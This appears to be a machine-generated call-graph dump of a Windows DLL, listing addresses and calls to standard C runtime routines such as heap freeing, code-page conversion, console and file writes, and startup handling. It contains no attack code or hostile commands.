7287->7311 7320 232d679a 7288->7320 7292 232d62bc ___std_exception_copy 11 API calls 7291->7292 7293 232d657f 7292->7293 7295 232d658c 7294->7295 7295->7295 7296 232d637b _free 20 API calls 7295->7296 7297 232d65ba 7296->7297 7298 232d85eb 26 API calls 7297->7298 7299 232d65e6 7298->7299 7300 232d62bc ___std_exception_copy 11 API calls 7299->7300 7301 232d6615 ___scrt_fastfail 7300->7301 7302 232d66b6 FindFirstFileExA 7301->7302 7303 232d6705 7302->7303 7304 232d6580 26 API calls 7303->7304 7306 232d4e87 7305->7306 7307 232d4e8b 7305->7307 7306->7287 7307->7306 7308 232d637b _free 20 API calls 7307->7308 7309 232d4eb9 7308->7309 7310 232d571e _free 20 API calls 7309->7310 7310->7306 7314 232d853a 7311->7314 7312 232d854f 7313 232d6368 _free 20 API calls 7312->7313 7315 232d8554 7312->7315 7319 232d857a 7313->7319 7314->7312 7314->7315 7317 232d858b 7314->7317 7315->7287 7316 232d62ac ___std_exception_copy 26 API calls 7316->7315 7317->7315 7318 232d6368 _free 20 API calls 7317->7318 7318->7319 7319->7316 7324 232d67a4 7320->7324 7321 232d67b4 7323 232d571e _free 20 API calls 7321->7323 7322 232d571e _free 20 API calls 7322->7324 7325 232d67bb 7323->7325 7324->7321 7324->7322 7325->7282 7066 232d3eb3 7069 232d5411 7066->7069 7070 232d541d _abort 7069->7070 7071 232d5af6 _abort 38 API calls 7070->7071 7074 232d5422 7071->7074 7072 232d55a8 _abort 38 API calls 7073 232d544c 7072->7073 7074->7072 6309 232d220c 6310 232d221a dllmain_dispatch 6309->6310 6311 232d2215 6309->6311 6313 232d22b1 6311->6313 6314 232d22c7 6313->6314 6315 232d22d0 6314->6315 6317 232d2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6314->6317 6315->6310 6317->6315 6452 232d284f 6453 232d2882 std::exception::exception 27 API calls 6452->6453 6454 232d285d 6453->6454 6455 232d724e GetProcessHeap 6456 232d2049 6457 232d2055 ___DestructExceptionObject 6456->6457 6458 232d207d 6457->6458 6459 232d20d3 6457->6459 6469 232d205e 6457->6469 6470 232d244c 6458->6470 6460 232d2639 ___scrt_fastfail 4 API calls 6459->6460 6462 232d20da 6460->6462 6463 232d2082 6479 232d2308 6463->6479 6465 232d2087 __RTC_Initialize 6482 232d20c4 6465->6482 6467 232d209f 6485 232d260b 6467->6485 6471 232d2451 ___scrt_release_startup_lock 6470->6471 6472 232d2455 6471->6472 6473 232d2461 6471->6473 6474 232d527a _abort 20 API calls 6472->6474 6476 232d246e 6473->6476 6477 232d499b _abort 28 API calls 6473->6477 6475 232d245f 6474->6475 6475->6463 6476->6463 6478 232d4bbd 6477->6478 6478->6463 6491 232d34c7 RtlInterlockedFlushSList 6479->6491 6481 232d2312 6481->6465 6493 232d246f 6482->6493 6484 232d20c9 ___scrt_release_startup_lock 6484->6467 6486 232d2617 6485->6486 6487 232d262d 6486->6487 6512 232d53ed 6486->6512 6487->6469 6490 232d3529 ___vcrt_uninitialize 8 API calls 6490->6487 6492 232d34d7 6491->6492 6492->6481 6498 232d53ff 6493->6498 6496 232d391b ___vcrt_uninitialize_ptd 6 API calls 6497 232d354d 6496->6497 6497->6484 6501 232d5c2b 6498->6501 6502 232d5c35 6501->6502 6503 232d2476 6501->6503 6505 232d5db2 6502->6505 6503->6496 6506 232d5c45 _free 5 API calls 6505->6506 6507 232d5dd9 6506->6507 6508 232d5df1 TlsFree 6507->6508 6511 232d5de5 6507->6511 6508->6511 6509 232d2ada _ValidateLocalCookies 5 API calls 6510 232d5e02 6509->6510 6510->6503 6511->6509 6515 232d74da 6512->6515 6517 232d74f3 6515->6517 6516 232d2ada _ValidateLocalCookies 5 API calls 6518 232d2625 6516->6518 6517->6516 6518->6490 7075 232d8a89 7078 232d6d60 7075->7078 7079 232d6d69 7078->7079 7080 232d6d72 7078->7080 7082 232d6c5f 7079->7082 7083 232d5af6 _abort 38 API calls 7082->7083 7084 232d6c6c 7083->7084 7085 232d6d7e __fassign 38 API calls 7084->7085 7086 232d6c74 7085->7086 7102 232d69f3 7086->7102 7089 232d6c8b 7089->7080 7090 232d56d0 21 API calls 7091 232d6c9c 7090->7091 7092 232d6cce 7091->7092 7109 232d6e20 7091->7109 7095 232d571e _free 20 API calls 7092->7095 7095->7089 7096 232d6cc9 7097 232d6368 _free 20 API calls 7096->7097 7097->7092 7098 232d6d12 7098->7092 7119 232d68c9 7098->7119 7099 232d6ce6 7099->7098 7100 232d571e _free 20 API calls 7099->7100 7100->7098 7103 232d54a7 __fassign 38 API calls 7102->7103 7104 232d6a05 7103->7104 7105 232d6a14 GetOEMCP 7104->7105 7106 232d6a26 7104->7106 7108 232d6a3d 7105->7108 7107 232d6a2b GetACP 7106->7107 7106->7108 7107->7108 7108->7089 7108->7090 7110 232d69f3 40 API calls 7109->7110 7111 232d6e3f 7110->7111 7114 232d6e90 IsValidCodePage 7111->7114 7116 232d6e46 7111->7116 7118 232d6eb5 ___scrt_fastfail 7111->7118 7112 232d2ada _ValidateLocalCookies 5 API calls 7113 232d6cc1 7112->7113 7113->7096 7113->7099 7115 232d6ea2 GetCPInfo 7114->7115 7114->7116 7115->7116 7115->7118 7116->7112 7122 232d6acb GetCPInfo 7118->7122 7195 232d6886 7119->7195 7121 232d68ed 7121->7092 7123 232d6b05 7122->7123 7124 232d6baf 7122->7124 7132 232d86e4 7123->7132 7127 232d2ada _ValidateLocalCookies 5 API calls 7124->7127 7129 232d6c5b 7127->7129 7129->7116 7131 232d8a3e 43 API calls 7131->7124 7133 232d54a7 __fassign 38 API calls 7132->7133 7134 232d8704 MultiByteToWideChar 7133->7134 7136 232d87da 7134->7136 7137 232d8742 7134->7137 7138 232d2ada _ValidateLocalCookies 5 API calls 7136->7138 7139 232d56d0 21 API calls 7137->7139 7143 232d8763 ___scrt_fastfail 7137->7143 7140 232d6b66 7138->7140 7139->7143 7146 232d8a3e 7140->7146 7141 232d87d4 7151 232d8801 7141->7151 7143->7141 7144 232d87a8 MultiByteToWideChar 7143->7144 7144->7141 7145 232d87c4 GetStringTypeW 7144->7145 7145->7141 7147 232d54a7 __fassign 38 API calls 7146->7147 7148 232d8a51 7147->7148 7155 232d8821 7148->7155 7152 232d880d 7151->7152 7153 232d881e 7151->7153 7152->7153 7154 232d571e _free 20 API calls 7152->7154 7153->7136 7154->7153 7156 232d883c 7155->7156 7157 232d8862 MultiByteToWideChar 7156->7157 7158 232d888c 7157->7158 7159 232d8a16 7157->7159 7164 232d56d0 21 API calls 7158->7164 7166 232d88ad 7158->7166 7160 232d2ada _ValidateLocalCookies 5 API calls 7159->7160 7161 232d6b87 7160->7161 7161->7131 7162 232d8962 7168 232d8801 __freea 20 API calls 7162->7168 7163 232d88f6 MultiByteToWideChar 7163->7162 7165 232d890f 7163->7165 7164->7166 7182 232d5f19 7165->7182 7166->7162 7166->7163 7168->7159 7170 232d8939 7170->7162 7173 232d5f19 11 API calls 7170->7173 7171 232d8971 7172 232d56d0 21 API calls 7171->7172 7176 232d8992 7171->7176 7172->7176 7173->7162 7174 232d8a07 7175 232d8801 __freea 20 API calls 7174->7175 7175->7162 7176->7174 7177 232d5f19 11 API calls 7176->7177 7178 232d89e6 7177->7178 7178->7174 7179 232d89f5 WideCharToMultiByte 7178->7179 7179->7174 7180 232d8a35 7179->7180 7181 232d8801 __freea 20 API calls 7180->7181 7181->7162 7183 232d5c45 _free 5 API calls 7182->7183 7184 232d5f40 7183->7184 7187 232d5f49 7184->7187 7190 232d5fa1 7184->7190 7188 232d2ada _ValidateLocalCookies 5 API calls 7187->7188 7189 232d5f9b 7188->7189 7189->7162 7189->7170 7189->7171 7191 232d5c45 _free 5 API calls 7190->7191 7192 232d5fc8 7191->7192 7193 232d2ada _ValidateLocalCookies 5 API calls 7192->7193 7194 232d5f89 LCMapStringW 7193->7194 7194->7187 7196 232d6892 ___DestructExceptionObject 7195->7196 7203 232d5671 RtlEnterCriticalSection 7196->7203 7198 232d689c 7204 232d68f1 7198->7204 7202 232d68b5 _abort 7202->7121 7203->7198 7216 232d7011 7204->7216 7206 232d693f 7207 232d7011 26 API calls 7206->7207 7208 232d695b 7207->7208 7209 232d7011 26 API calls 7208->7209 7210 232d6979 7209->7210 7211 232d571e _free 20 API calls 7210->7211 7212 232d68a9 7210->7212 7211->7212 7213 232d68bd 7212->7213 7230 232d56b9 RtlLeaveCriticalSection 7213->7230 7215 232d68c7 7215->7202 7217 232d7022 7216->7217 7226 232d701e 7216->7226 7218 232d7029 7217->7218 7221 232d703c ___scrt_fastfail 7217->7221 7219 232d6368 _free 20 API calls 7218->7219 7220 232d702e 7219->7220 7222 232d62ac ___std_exception_copy 26 API calls 7220->7222 7223 232d706a 7221->7223 7224 232d7073 7221->7224 7221->7226 7222->7226 7225 232d6368 _free 20 API calls 7223->7225 7224->7226 7228 232d6368 _free 20 API calls 7224->7228 7227 232d706f 7225->7227 7226->7206 7229 232d62ac ___std_exception_copy 26 API calls 7227->7229 7228->7227 7229->7226 7230->7215 6519 232d5348 6520 232d3529 ___vcrt_uninitialize 8 API calls 6519->6520 6521 232d534f 6520->6521 6522 232d7b48 6532 232d8ebf 6522->6532 6526 232d7b55 6545 232d907c 6526->6545 6529 232d7b7f 6530 232d571e _free 20 API calls 6529->6530 6531 232d7b8a 6530->6531 6549 232d8ec8 6532->6549 6534 232d7b50 6535 232d8fdc 6534->6535 6536 232d8fe8 ___DestructExceptionObject 6535->6536 6569 232d5671 RtlEnterCriticalSection 6536->6569 6538 232d905e 6583 232d9073 6538->6583 6539 232d8ff3 6539->6538 6541 232d9032 RtlDeleteCriticalSection 6539->6541 6570 232da09c 6539->6570 6544 232d571e _free 20 API calls 6541->6544 6542 232d906a _abort 6542->6526 6544->6539 6546 232d7b64 RtlDeleteCriticalSection 6545->6546 6547 232d9092 6545->6547 6546->6526 6546->6529 6547->6546 6548 232d571e _free 20 API calls 6547->6548 6548->6546 6550 232d8ed4 ___DestructExceptionObject 6549->6550 6559 232d5671 RtlEnterCriticalSection 6550->6559 6552 232d8f77 6564 232d8f97 6552->6564 6555 232d8f83 _abort 6555->6534 6557 232d8e78 66 API calls 6558 232d8ee3 6557->6558 6558->6552 6558->6557 6560 232d7b94 RtlEnterCriticalSection 6558->6560 6561 232d8f6d 6558->6561 6559->6558 6560->6558 6567 232d7ba8 RtlLeaveCriticalSection 6561->6567 6563 232d8f75 6563->6558 6568 232d56b9 RtlLeaveCriticalSection 6564->6568 6566 232d8f9e 6566->6555 6567->6563 6568->6566 6569->6539 6571 232da0a8 ___DestructExceptionObject 6570->6571 6572 232da0ce 6571->6572 6573 232da0b9 6571->6573 6579 232da0c9 _abort 6572->6579 6586 232d7b94 RtlEnterCriticalSection 6572->6586 6574 232d6368 _free 20 API calls 6573->6574 6576 232da0be 6574->6576 6578 232d62ac ___std_exception_copy 26 API calls 6576->6578 6577 232da0ea 6587 232da026 6577->6587 6578->6579 6579->6539 6581 232da0f5 6603 232da112 6581->6603 6867 232d56b9 RtlLeaveCriticalSection 6583->6867 6585 232d907a 6585->6542 6586->6577 6588 232da048 6587->6588 6589 232da033 6587->6589 6594 232da043 6588->6594 6606 232d8e12 6588->6606 6590 232d6368 _free 20 API calls 6589->6590 6591 232da038 6590->6591 6593 232d62ac ___std_exception_copy 26 API calls 6591->6593 6593->6594 6594->6581 6596 232d907c 20 API calls 6597 232da064 6596->6597 6612 232d7a5a 6597->6612 6599 232da06a 6619 232dadce 6599->6619 6602 232d571e _free 20 API calls 6602->6594 6866 232d7ba8 RtlLeaveCriticalSection 6603->6866 6605 232da11a 6605->6579 6607 232d8e2a 6606->6607 6611 232d8e26 6606->6611 6608 232d7a5a 26 API calls 6607->6608 6607->6611 6609 232d8e4a 6608->6609 6634 232d9a22 6609->6634 6611->6596 6613 232d7a7b 6612->6613 6614 232d7a66 6612->6614 6613->6599 6615 232d6368 _free 20 API calls 6614->6615 6616 232d7a6b 6615->6616 6617 232d62ac ___std_exception_copy 26 API calls 6616->6617 6618 232d7a76 6617->6618 6618->6599 6620 232daddd 6619->6620 6621 232dadf2 6619->6621 6622 232d6355 __dosmaperr 20 API calls 6620->6622 6623 232dae2d 6621->6623 6627 232dae19 6621->6627 6624 232dade2 6622->6624 6625 232d6355 __dosmaperr 20 API calls 6623->6625 6626 232d6368 _free 20 API calls 6624->6626 6628 232dae32 6625->6628 6631 232da070 6626->6631 6823 232dada6 6627->6823 6630 232d6368 _free 20 API calls 6628->6630 6632 232dae3a 6630->6632 6631->6594 6631->6602 6633 232d62ac ___std_exception_copy 26 API calls 6632->6633 6633->6631 6635 232d9a2e ___DestructExceptionObject 6634->6635 6636 232d9a4e 6635->6636 6637 232d9a36 6635->6637 6639 232d9aec 6636->6639 6643 232d9a83 6636->6643 6659 232d6355 6637->6659 6640 232d6355 __dosmaperr 20 API calls 6639->6640 6642 232d9af1 6640->6642 6645 232d6368 _free 20 API calls 6642->6645 6662 232d8c7b RtlEnterCriticalSection 6643->6662 6644 232d6368 _free 20 API calls 6653 232d9a43 _abort 6644->6653 6647 232d9af9 6645->6647 6649 232d62ac ___std_exception_copy 26 API calls 6647->6649 6648 232d9a89 6650 232d9aba 6648->6650 6651 232d9aa5 6648->6651 6649->6653 6663 232d9b0d 6650->6663 6652 232d6368 _free 20 API calls 6651->6652 6655 232d9aaa 6652->6655 6653->6611 6657 232d6355 __dosmaperr 20 API calls 6655->6657 6656 232d9ab5 6714 232d9ae4 6656->6714 6657->6656 6660 232d5b7a _free 20 API calls 6659->6660 6661 232d635a 6660->6661 6661->6644 6662->6648 6664 232d9b3b 6663->6664 6701 232d9b34 6663->6701 6665 232d9b3f 6664->6665 6666 232d9b5e 6664->6666 6667 232d6355 __dosmaperr 20 API calls 6665->6667 6670 232d9baf 6666->6670 6671 232d9b92 6666->6671 6669 232d9b44 6667->6669 6668 232d2ada _ValidateLocalCookies 5 API calls 6672 232d9d15 6668->6672 6673 232d6368 _free 20 API calls 6669->6673 6681 232d9bc5 6670->6681 6717 232da00b 6670->6717 6674 232d6355 __dosmaperr 20 API calls 6671->6674 6672->6656 6675 232d9b4b 6673->6675 6678 232d9b97 6674->6678 6680 232d62ac ___std_exception_copy 26 API calls 6675->6680 6679 232d6368 _free 20 API calls 6678->6679 6683 232d9b9f 6679->6683 6680->6701 6720 232d96b2 6681->6720 6686 232d62ac ___std_exception_copy 26 API calls 6683->6686 6684 232d9c0c 6687 232d9c66 WriteFile 6684->6687 6688 232d9c20 6684->6688 6685 232d9bd3 6689 232d9bf9 6685->6689 6690 232d9bd7 6685->6690 6686->6701 6691 232d9c89 GetLastError 6687->6691 6697 232d9bef 6687->6697 6693 232d9c28 6688->6693 6694 232d9c56 6688->6694 6732 232d9492 GetConsoleCP 6689->6732 6695 232d9ccd 6690->6695 6727 232d9645 6690->6727 6691->6697 6698 232d9c2d 6693->6698 6699 232d9c46 6693->6699 6758 232d9728 6694->6758 6695->6701 6702 232d6368 _free 20 API calls 6695->6702 6697->6695 6697->6701 6705 232d9ca9 6697->6705 6698->6695 6743 232d9807 6698->6743 6750 232d98f5 6699->6750 6701->6668 6704 232d9cf2 6702->6704 6707 232d6355 __dosmaperr 20 API calls 6704->6707 6708 232d9cc4 6705->6708 6709 232d9cb0 6705->6709 6707->6701 6765 232d6332 6708->6765 6710 232d6368 _free 20 API calls 6709->6710 6712 232d9cb5 6710->6712 6713 232d6355 __dosmaperr 20 API calls 6712->6713 6713->6701 6822 232d8c9e RtlLeaveCriticalSection 6714->6822 6716 232d9aea 6716->6653 6770 232d9f8d 6717->6770 6792 232d8dbc 6720->6792 6722 232d96c7 6722->6684 6722->6685 6723 232d96c2 6723->6722 6724 232d5af6 _abort 38 API calls 6723->6724 6725 232d96ea 6724->6725 6725->6722 6726 232d9708 GetConsoleMode 6725->6726 6726->6722 6730 232d969f 6727->6730 6731 232d966a 6727->6731 6728 232d96a1 GetLastError 6728->6730 6729 232da181 WriteConsoleW CreateFileW 6729->6731 6730->6697 6731->6728 6731->6729 6731->6730 6737 232d94f5 6732->6737 6739 232d9607 6732->6739 6733 232d2ada _ValidateLocalCookies 5 API calls 6734 232d9641 6733->6734 6734->6697 6736 232d79e6 40 API calls __fassign 6736->6737 6737->6736 6738 232d957b WideCharToMultiByte 6737->6738 6737->6739 6742 232d95d2 WriteFile 6737->6742 6801 232d7c19 6737->6801 6738->6739 6740 232d95a1 WriteFile 6738->6740 6739->6733 6740->6737 6741 232d962a GetLastError 6740->6741 6741->6739 6742->6737 6742->6741 6746 232d9816 6743->6746 6744 232d98d8 6745 232d2ada _ValidateLocalCookies 5 API calls 6744->6745 6748 232d98f1 6745->6748 6746->6744 6747 232d9894 WriteFile 6746->6747 6747->6746 6749 232d98da GetLastError 6747->6749 6748->6697 6749->6744 6757 232d9904 6750->6757 6751 232d9a0f 6752 232d2ada _ValidateLocalCookies 5 API calls 6751->6752 6753 232d9a1e 6752->6753 6753->6697 6754 232d9986 WideCharToMultiByte 6755 232d99bb WriteFile 6754->6755 6756 232d9a07 GetLastError 6754->6756 6755->6756 6755->6757 6756->6751 6757->6751 6757->6754 6757->6755 6762 232d9737 6758->6762 6759 232d97ea 6761 232d2ada _ValidateLocalCookies 5 API calls 6759->6761 6760 232d97a9 WriteFile 6760->6762 6763 232d97ec GetLastError 6760->6763 6764 232d9803 6761->6764 6762->6759 6762->6760 6763->6759 6764->6697 6766 232d6355 __dosmaperr 20 API calls 6765->6766 6767 232d633d _free 6766->6767 6768 232d6368 _free 20 API calls 6767->6768 6769 232d6350 6768->6769 6769->6701 6779 232d8d52 6770->6779 6772 232d9f9f 6773 232d9fb8 SetFilePointerEx 6772->6773 6774 232d9fa7 6772->6774 6776 232d9fac 6773->6776 6777 232d9fd0 GetLastError 6773->6777 6775 232d6368 _free 20 API calls 6774->6775 6775->6776 6776->6681 6778 232d6332 __dosmaperr 20 API calls 6777->6778 6778->6776 6780 232d8d5f 6779->6780 6781 232d8d74 6779->6781 6782 232d6355 __dosmaperr 20 API calls 6780->6782 6783 232d6355 __dosmaperr 20 API calls 6781->6783 6787 232d8d99 6781->6787 6784 232d8d64 6782->6784 6785 232d8da4 6783->6785 6786 232d6368 _free 20 API calls 6784->6786 6788 232d6368 _free 20 API calls 6785->6788 6789 232d8d6c 6786->6789 6787->6772 6790 232d8dac 6788->6790 6789->6772 6791 232d62ac ___std_exception_copy 26 API calls 6790->6791 6791->6789 6793 232d8dc9 6792->6793 6794 232d8dd6 6792->6794 6795 232d6368 _free 20 API calls 6793->6795 6797 232d8de2 6794->6797 6798 232d6368 _free 20 API calls 6794->6798 6796 232d8dce 6795->6796 6796->6723 6797->6723 6799 232d8e03 6798->6799 6800 232d62ac ___std_exception_copy 26 API calls 6799->6800 6800->6796 6802 232d5af6 _abort 38 API calls 6801->6802 6803 232d7c24 6802->6803 6806 232d7a00 6803->6806 6807 232d7a28 6806->6807 6808 232d7a13 6806->6808 6807->6737 6808->6807 6810 232d7f0f 6808->6810 6811 232d7f1b ___DestructExceptionObject 6810->6811 6812 232d5af6 _abort 38 API calls 6811->6812 6813 232d7f24 6812->6813 6814 232d5671 _abort RtlEnterCriticalSection 6813->6814 6815 232d7f72 _abort 6813->6815 6816 232d7f42 6814->6816 6815->6807 6817 232d7f86 __fassign 20 API calls 6816->6817 6818 232d7f56 6817->6818 6819 232d7f75 __fassign RtlLeaveCriticalSection 6818->6819 6820 232d7f69 6819->6820 6820->6815 6821 232d55a8 _abort 38 API calls 6820->6821 6821->6815 6822->6716 6826 232dad24 6823->6826 6825 232dadca 6825->6631 6827 232dad30 ___DestructExceptionObject 6826->6827 6837 232d8c7b RtlEnterCriticalSection 6827->6837 6829 232dad3e 6830 232dad65 6829->6830 6831 232dad70 6829->6831 6838 232dae4d 6830->6838 6833 232d6368 _free 20 API calls 6831->6833 6834 232dad6b 6833->6834 6853 232dad9a 6834->6853 6836 232dad8d _abort 6836->6825 6837->6829 6839 232d8d52 26 API calls 6838->6839 6842 232dae5d 6839->6842 6840 232dae63 6856 232d8cc1 6840->6856 6842->6840 6843 232dae95 6842->6843 6846 232d8d52 26 API calls 6842->6846 6843->6840 6844 232d8d52 26 API calls 6843->6844 6848 232daea1 CloseHandle 6844->6848 6847 232dae8c 6846->6847 6850 232d8d52 26 API calls 6847->6850 6848->6840 6851 232daead GetLastError 6848->6851 6849 232daedd 6849->6834 6850->6843 6851->6840 6852 232d6332 __dosmaperr 20 API calls 6852->6849 6865 232d8c9e RtlLeaveCriticalSection 6853->6865 6855 232dada4 6855->6836 6857 232d8d37 6856->6857 6858 232d8cd0 6856->6858 6859 232d6368 _free 20 API calls 6857->6859 6858->6857 6863 232d8cfa 6858->6863 6860 232d8d3c 6859->6860 6861 232d6355 __dosmaperr 20 API calls 6860->6861 6862 232d8d27 6861->6862 6862->6849 6862->6852 6863->6862 6864 232d8d21 SetStdHandle 6863->6864 6864->6862 6865->6855 6866->6605 6867->6585 6868 232da945 6870 232da96d 6868->6870 6869 232da9a5 6870->6869 6871 232da99e 6870->6871 6872 232da997 6870->6872 6881 232daa00 6871->6881 6877 232daa17 6872->6877 6878 232daa20 6877->6878 6885 232db19b 6878->6885 6882 232daa20 6881->6882 6883 232db19b __startOneArgErrorHandling 21 API calls 6882->6883 6884 232da9a3 6883->6884 6887 232db1da __startOneArgErrorHandling 6885->6887 6891 232db25c __startOneArgErrorHandling 6887->6891 6895 232db59e 6887->6895 6888 232db286 6889 232db8b2 __startOneArgErrorHandling 20 API calls 6888->6889 6890 232db292 6888->6890 6889->6890 6892 232d2ada _ValidateLocalCookies 5 API calls 6890->6892 6891->6888 6893 232d78a3 __startOneArgErrorHandling 5 API calls 6891->6893 6894 232da99c 6892->6894 6893->6888 6896 232db5c1 __raise_exc RaiseException 6895->6896 6897 232db5bc 6896->6897 6897->6891 7326 232d7bc7 7327 232d7bd3 ___DestructExceptionObject 7326->7327 7328 232d7c0a _abort 7327->7328 7334 232d5671 RtlEnterCriticalSection 7327->7334 7330 232d7be7 7335 232d7f86 7330->7335 7334->7330 7336 232d7f94 __fassign 7335->7336 7337 232d7bf7 7335->7337 7336->7337 7342 232d7cc2 7336->7342 7339 232d7c10 7337->7339 7456 232d56b9 RtlLeaveCriticalSection 7339->7456 7341 232d7c17 7341->7328 7343 232d7cd8 7342->7343 7345 232d7d42 7342->7345 7343->7345 7347 232d7d0b 7343->7347 7352 232d571e _free 20 API calls 7343->7352 7346 232d571e _free 20 API calls 7345->7346 7369 232d7d90 7345->7369 7348 232d7d64 7346->7348 7349 232d7d2d 7347->7349 7357 232d571e _free 20 API calls 7347->7357 7350 232d571e _free 20 API calls 7348->7350 7351 232d571e _free 20 API calls 7349->7351 7353 232d7d77 7350->7353 7354 232d7d37 7351->7354 7356 232d7d00 7352->7356 7358 232d571e _free 20 API calls 7353->7358 7359 232d571e _free 20 API calls 7354->7359 7355 232d7dfe 7360 232d571e _free 20 API calls 7355->7360 7370 232d90ba 7356->7370 7363 232d7d22 7357->7363 7364 232d7d85 7358->7364 7359->7345 7367 232d7e04 7360->7367 7362 232d571e 20 API calls _free 7368 232d7d9e 7362->7368 7398 232d91b8 7363->7398 7366 232d571e _free 20 API calls 7364->7366 7366->7369 7367->7337 7368->7355 7368->7362 7410 232d7e35 7369->7410 7371 232d90cb 7370->7371 7372 232d91b4 7370->7372 7373 232d90dc 7371->7373 7375 232d571e _free 20 API calls 7371->7375 7372->7347 7374 232d90ee 7373->7374 7376 232d571e _free 20 API calls 7373->7376 7377 232d9100 7374->7377 7378 232d571e _free 20 API calls 7374->7378 7375->7373 7376->7374 7379 232d9112 7377->7379 7380 232d571e _free 20 API calls 7377->7380 7378->7377 7381 232d9124 7379->7381 7383 232d571e _free 20 API calls 7379->7383 7380->7379 7382 232d9136 7381->7382 7384 232d571e _free 20 API calls 7381->7384 7385 232d9148 7382->7385 7386 232d571e _free 20 API calls 7382->7386 7383->7381 7384->7382 7387 232d915a 7385->7387 7388 232d571e _free 20 API calls 7385->7388 7386->7385 7389 232d916c 7387->7389 7391 232d571e _free 20 API calls 7387->7391 7388->7387 7390 232d917e 7389->7390 7392 232d571e _free 20 API calls 7389->7392 7393 232d9190 7390->7393 7394 232d571e _free 20 API calls 7390->7394 7391->7389 7392->7390 7395 232d91a2 7393->7395 7396 232d571e _free 20 API calls 7393->7396 7394->7393 7395->7372 7397 232d571e _free 20 API calls 7395->7397 7396->7395 7397->7372 7399 232d91c5 7398->7399 7409 232d921d 7398->7409 7400 232d91d5 7399->7400 7401 232d571e _free 20 API calls 7399->7401 7402 232d91e7 7400->7402 7403 232d571e _free 20 API calls 7400->7403 7401->7400 7404 232d91f9 7402->7404 7406 232d571e _free 20 API calls 7402->7406 7403->7402 7405 232d920b 7404->7405 7407 232d571e _free 20 API calls 7404->7407 7408 232d571e _free 20 API calls 7405->7408 7405->7409 7406->7404 7407->7405 7408->7409 7409->7349 7411 232d7e60 7410->7411 7412 232d7e42 7410->7412 7411->7368 7412->7411 7416 232d925d 7412->7416 7415 232d571e _free 20 API calls 7415->7411 7417 232d7e5a 7416->7417 7418 232d926e 7416->7418 7417->7415 7452 232d9221 7418->7452 7421 232d9221 __fassign 20 API calls 7422 232d9281 7421->7422 7423 232d9221 __fassign 20 API calls 7422->7423 7424 232d928c 7423->7424 7425 232d9221 __fassign 20 API calls 7424->7425 7426 232d9297 7425->7426 7427 232d9221 __fassign 20 API calls 7426->7427 7428 232d92a5 7427->7428 7429 232d571e _free 20 API calls 7428->7429 7430 232d92b0 7429->7430 7431 232d571e _free 20 API calls 7430->7431 7432 232d92bb 7431->7432 7433 232d571e _free 20 API calls 7432->7433 7434 232d92c6 7433->7434 7435 232d9221 __fassign 20 API calls 7434->7435 7436 232d92d4 7435->7436 7437 232d9221 __fassign 20 API calls 7436->7437 7438 232d92e2 7437->7438 7439 232d9221 __fassign 20 API calls 7438->7439 7440 232d92f3 7439->7440 7441 232d9221 __fassign 20 API calls 7440->7441 7442 232d9301 7441->7442 7443 232d9221 __fassign 20 API calls 7442->7443 7444 232d930f 7443->7444 7445 232d571e _free 20 API calls 7444->7445 7446 232d931a 7445->7446 7447 232d571e _free 20 API calls 7446->7447 7448 232d9325 7447->7448 7449 232d571e _free 20 API calls 7448->7449 7450 232d9330 7449->7450 7451 232d571e _free 20 API calls 7450->7451 7451->7417 7453 232d9258 7452->7453 7454 232d9248 7452->7454 7453->7421 7454->7453 7455 232d571e _free 20 API calls 7454->7455 7455->7454 7456->7341 7457 232da1c6 IsProcessorFeaturePresent 6898 232d8640 6901 232d8657 6898->6901 6902 232d8679 6901->6902 6903 232d8665 6901->6903 6905 232d8681 6902->6905 6906 232d8693 6902->6906 6904 232d6368 _free 20 API calls 6903->6904 6907 232d866a 6904->6907 6908 232d6368 _free 20 API calls 6905->6908 6912 232d8652 6906->6912 6914 232d54a7 6906->6914 6910 232d62ac ___std_exception_copy 26 API calls 6907->6910 6911 232d8686 6908->6911 6910->6912 6913 232d62ac ___std_exception_copy 26 API calls 6911->6913 6913->6912 6915 232d54ba 6914->6915 6916 232d54c4 6914->6916 6915->6912 6916->6915 6917 232d5af6 _abort 38 API calls 6916->6917 6918 232d54e5 6917->6918 6919 232d7a00 __fassign 38 API calls 6918->6919 6920 232d54fe 6919->6920 6922 232d7a2d 6920->6922 6923 232d7a55 6922->6923 6924 232d7a40 6922->6924 6923->6915 6924->6923 6926 232d6d7e 6924->6926 6927 232d6d8a ___DestructExceptionObject 6926->6927 6928 232d5af6 _abort 38 API calls 6927->6928 6933 232d6d94 6928->6933 6930 232d6e18 _abort 6930->6923 6932 232d55a8 _abort 38 API calls 6932->6933 6933->6930 6933->6932 6934 232d571e _free 20 API calls 6933->6934 6935 232d5671 RtlEnterCriticalSection 6933->6935 6936 232d6e0f 6933->6936 6934->6933 6935->6933 6939 232d56b9 RtlLeaveCriticalSection 6936->6939 6938 232d6e16 6938->6933 6939->6938 7235 232d7a80 7236 232d7a8d 7235->7236 7237 232d637b _free 20 API calls 7236->7237 7238 232d7aa7 7237->7238 7239 232d571e _free 20 API calls 7238->7239 7240 232d7ab3 7239->7240 7241 232d7ad9 7240->7241 7242 232d637b _free 20 API calls 7240->7242 7243 232d5eb7 11 API calls 7241->7243 7246 232d7ae5 7241->7246 7247 232d7b43 7241->7247 7244 232d7acd 7242->7244 7243->7241 7245 232d571e _free 20 API calls 7244->7245 7245->7241 6318 232d5303 6321 232d50a5 6318->6321 6330 232d502f 6321->6330 6324 232d502f 5 API calls 6325 232d50c3 6324->6325 6334 232d5000 6325->6334 6328 232d5000 20 API calls 6329 232d50d9 6328->6329 6331 232d5048 6330->6331 6332 232d2ada _ValidateLocalCookies 5 API calls 6331->6332 6333 232d5069 6332->6333 6333->6324 6335 232d500d 6334->6335 6339 232d502a 6334->6339 6336 232d5024 6335->6336 6337 232d571e _free 20 API calls 6335->6337 6338 232d571e _free 20 API calls 6336->6338 6337->6335 6338->6339 6339->6328 6340 232d7103 GetCommandLineA GetCommandLineW 6940 232daf43 6941 232daf4d 6940->6941 6942 232daf59 6940->6942 6941->6942 6943 232daf52 CloseHandle 6941->6943 6943->6942 7458 232d4bdd 7459 232d4bec 7458->7459 7460 232d4c08 7458->7460 7459->7460 7461 232d4bf2 7459->7461 7462 232d6d60 51 API calls 7460->7462 7463 232d6368 _free 20 API calls 7461->7463 7464 232d4c0f GetModuleFileNameA 7462->7464 7465 232d4bf7 7463->7465 7466 232d4c33 7464->7466 7467 232d62ac ___std_exception_copy 26 API calls 7465->7467 7481 232d4d01 7466->7481 7468 232d4c01 7467->7468 7471 232d4e76 20 API calls 7472 232d4c5d 7471->7472 7473 232d4c66 7472->7473 7474 232d4c72 7472->7474 